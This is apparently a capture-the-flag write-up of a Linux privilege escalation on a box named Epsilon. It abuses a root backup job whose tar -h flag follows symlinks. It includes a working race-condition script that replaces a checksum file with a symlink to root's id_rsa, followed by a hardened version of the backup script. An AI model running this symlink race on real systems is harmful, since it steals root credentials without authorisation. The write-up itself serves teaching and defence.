Tar Symlink Exploitation (Linux)

Abusing dereference

Reviewing the code inside, we get this:

#!/bin/bash
file=`date +%N`
/usr/bin/rm -rf /opt/backups/*
/usr/bin/tar -cvf "/opt/backups/$file.tar" /var/www/app/
sha1sum "/opt/backups/$file.tar" | cut -d ' ' -f1 > /opt/backups/checksum
sleep 5
check_file=`date +%N`
/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"
/usr/bin/rm -rf /opt/backups/*

Looking at the last tar command, one flag stands out: -h:

/usr/bin/tar -chvf "/var/backups/web_backups/${check_file}.tar" /opt/backups/checksum "/opt/backups/$file.tar"

After reading the tar manual, we can see that this flag makes tar follow symlinks and archive the file they point to, instead of the link itself:

       --exclude-vcs-ignores
              Exclude files that match patterns read from VCS-specific ignore files.
              Supported files are: .cvsignore, .gitignore, .bzrignore, and .hgignore.

       -h, --dereference
              Follow symlinks; archive and dump the files they point to.

       --hard-dereference
              Follow hard links; archive and dump the files they refer to.

With this in mind, we can win a race against the backup job: delete the checksum file as soon as it is generated and replace it with a symlink pointing to a file that lets us escalate privileges (root's id_rsa, for example). Because the second tar runs with -h, it will archive the contents of the target file under the name "checksum".

First we need a script that waits for the checksum file to appear, removes it, and creates our symlink in its place pointing to root's id_rsa, exactly like this:

#!/bin/bash

while true
do
        if [ -e /opt/backups/checksum ]
        then
                rm -rf /opt/backups/checksum
                ln -s /root/.ssh/id_rsa /opt/backups/checksum
                break;
        fi
done
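What makes this race winnable is the combination of three things in the original job: a staging directory (/opt/backups) the low-privileged user can write to, a five-second window between writing the checksum and the second tar, and the -h flag that dereferences whatever is sitting at that path by then. The script below is an added example of how the same backup could be written safely; it is not the script from the machine. It stages in a private mktemp directory (mode 0700), drops -h, and refuses to archive any path that is a symlink immediately before the second tar. The function names refuse_symlinks and safe_backup, and the argument layout, are my own choices.

```shell
#!/bin/bash
# Hardened variant of the backup job discussed above (added example, not the
# original script). Assumptions: the source and destination directories are
# passed as arguments, and staging happens in a private mktemp directory
# instead of a shared, world-writable /opt/backups.

# Return 1 if any given path is a symlink, so the caller never archives a
# link that another user may have planted in a shared directory.
refuse_symlinks() {
    for p in "$@"; do
        if [ -L "$p" ]; then
            echo "refusing symlink: $p" >&2
            return 1
        fi
    done
    return 0
}

# safe_backup SRC_DIR DEST_DIR
# Archives SRC_DIR, records its sha1, and bundles both into DEST_DIR.
safe_backup() {
    src="$1"      # directory to back up, e.g. /var/www/app
    dest="$2"     # final archive directory, e.g. /var/backups/web_backups
    stamp=$(date +%N)

    # Private staging area: unpredictable name, mode 0700, owned by the job's
    # user, so nobody else can swap files in during the window.
    stage=$(mktemp -d) || return 1
    chmod 700 "$stage"

    tar -cf "$stage/$stamp.tar" -C "$src" . || { rm -rf "$stage"; return 1; }
    sha1sum "$stage/$stamp.tar" | cut -d ' ' -f1 > "$stage/checksum"

    # Re-check right before the second tar: no -h (symlinks are stored as
    # links, never followed), and refuse outright if anything is a symlink.
    refuse_symlinks "$stage/checksum" "$stage/$stamp.tar" || { rm -rf "$stage"; return 1; }
    tar -cf "$dest/$stamp.tar" -C "$stage" checksum "$stamp.tar" || { rm -rf "$stage"; return 1; }

    rm -rf "$stage"
    return 0
}
```

The symlink check alone is not enough on its own, since a check-then-use gap still exists between the test and tar reading the file; the private staging directory is what actually closes the race, and dropping -h means that even if a link did get archived, tar would store the link entry rather than the contents of the target.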

Examples: Epsilon